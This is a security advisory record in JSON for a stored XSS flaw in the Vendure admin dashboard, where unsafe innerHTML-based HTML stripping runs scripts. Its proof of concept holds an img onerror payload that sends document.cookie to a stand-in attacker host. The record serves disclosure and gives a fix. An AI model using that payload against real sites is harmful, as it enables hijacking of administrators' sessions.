{"id":"CVE-2026-63459","aliases":[],"url":"https://o3.security/vulnerability/CVE-2026-63459","summary":"Vendure has stored XSS in the Admin Dashboard via unsafe HTML-stripping (innerHTML) of entity descriptions","details":"# Stored XSS in the Admin Dashboard via unsafe HTML-stripping (`innerHTML`) of entity descriptions\n\n**Package:** @vendure/dashboard (vendure-ecommerce/vendure, latest master) · \n\n## Summary\nThe dashboard's `RichTextDescriptionCell` \"strips HTML\" from an entity's `description` by assigning it to a live element's `innerHTML` and reading back `textContent`. This pattern still **executes** active markup: a `description` containing `<img src=x onerror=…>` runs script when the element is parsed (image resource loads even on a detached node in Chromium/Firefox, firing `onerror`). Because `description` is an admin-settable field shown in multiple list views, a lower-privilege administrator can store a payload that executes in a **higher-privilege administrator's** browser when they open the corresponding list — stored XSS leading to admin-session compromise.\n\n## Vulnerable code\n`packages/dashboard/src/lib/components/shared/table-cell/order-table-cell-components.tsx`\n```tsx\nexport const RichTextDescriptionCell: DataTableCellComponent<{ description: string }> = ({ cell }) => {\n    const value = cell.getValue();\n    const textContent = useMemo(() => {\n        if (!value) return '';\n        const div = document.createElement('div');\n        div.innerHTML = value;          // line 51 — parses/loads active markup; <img onerror> fires here\n        return div.textContent ?? '';   // line 52 — reading textContent does NOT undo the side effect\n    }, [value]);\n    ...\n}\n```\n`innerHTML` does not run `<script>`, but it **does** trigger resource loads / event handlers such as `<img src=x onerror=...>`, `<image>`, `<svg>` handlers — even on a detached element — so the assignment itself is the sink. Reading `textContent` afterwards is irrelevant; the handler has already executed.\n\n## Reachable from (all use this cell for the `description` column)\n- `_products/products.tsx:53`, `_collections/collections.tsx`, `_promotions/promotions.tsx:62`, `_payment-methods/payment-methods.tsx:57`, `_shipping-methods/shipping-methods.tsx:39`.\n\nAll of these are `description` fields editable by administrators with the corresponding catalog/promotion/settings write permissions — which, in Vendure's multi-channel model, includes **channel-scoped admins**.\n\n## Proof of concept\n1. As an administrator with `UpdateCatalog`/`UpdateProduct` (e.g. a channel-scoped admin), set a Product's `description` to:\n   `<img src=x onerror=\"fetch('https://attacker.example/'+encodeURIComponent(document.cookie))\">`\n2. Any administrator who opens the **Products** list in the dashboard renders `RichTextDescriptionCell` for that row → `div.innerHTML = description` → the `onerror` executes in their session.\n3. Payload runs with the viewing admin's privileges (e.g. a superadmin) → session/token exfiltration or admin actions → **cross-privilege / cross-channel admin takeover** (chains directly with the channel-scoping IDOR class already reported).\n\n## Impact\nStored XSS executing in administrators' browsers, escalating a low-privilege (e.g. single-channel) admin to actions as any admin who views the affected list. Account/store takeover.\n\n## Suggested fix\nStrip HTML with an **inert** parser (no script/resource execution) instead of a live element, or sanitize before display:\n```ts\n// inert: DOMParser documents do not execute scripts or load resources\nconst textContent = new DOMParser().parseFromString(value ?? '', 'text/html').body.textContent ?? '';\n```\n(Or render with a vetted sanitizer such as DOMPurify if rich text must be shown.) Audit the codebase for other `element.innerHTML = <untrusted>` assignments used for \"stripping\".","published":"2026-09-17T14:49:34Z","modified":"2026-09-17T15:00:06.524070422Z","cvss":{"score":8.7,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N"},"epss":null,"cisaKev":null,"exploitsKnown":null,"affectedPackages":[{"ecosystem":"npm","name":"@vendure/dashboard","fixedVersion":"3.6.5"}],"fix":{"url":"https://github.com/vendurehq/vendure/commit/d7aa42a3f0cb524297a1a2fdf700e4aba9aca684","label":"vendurehq/vendure@d7aa42a"},"references":[{"type":"WEB","url":"https://github.com/vendurehq/vendure/security/advisories/GHSA-xhq9-whgq-49j5"},{"type":"WEB","url":"https://github.com/vendurehq/vendure/commit/d7aa42a3f0cb524297a1a2fdf700e4aba9aca684"},{"type":"PACKAGE","url":"https://github.com/vendurehq/vendure"},{"type":"WEB","url":"https://github.com/vendurehq/vendure/releases/tag/v3.6.5"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-09-17T15:00:06.524070422Z"}}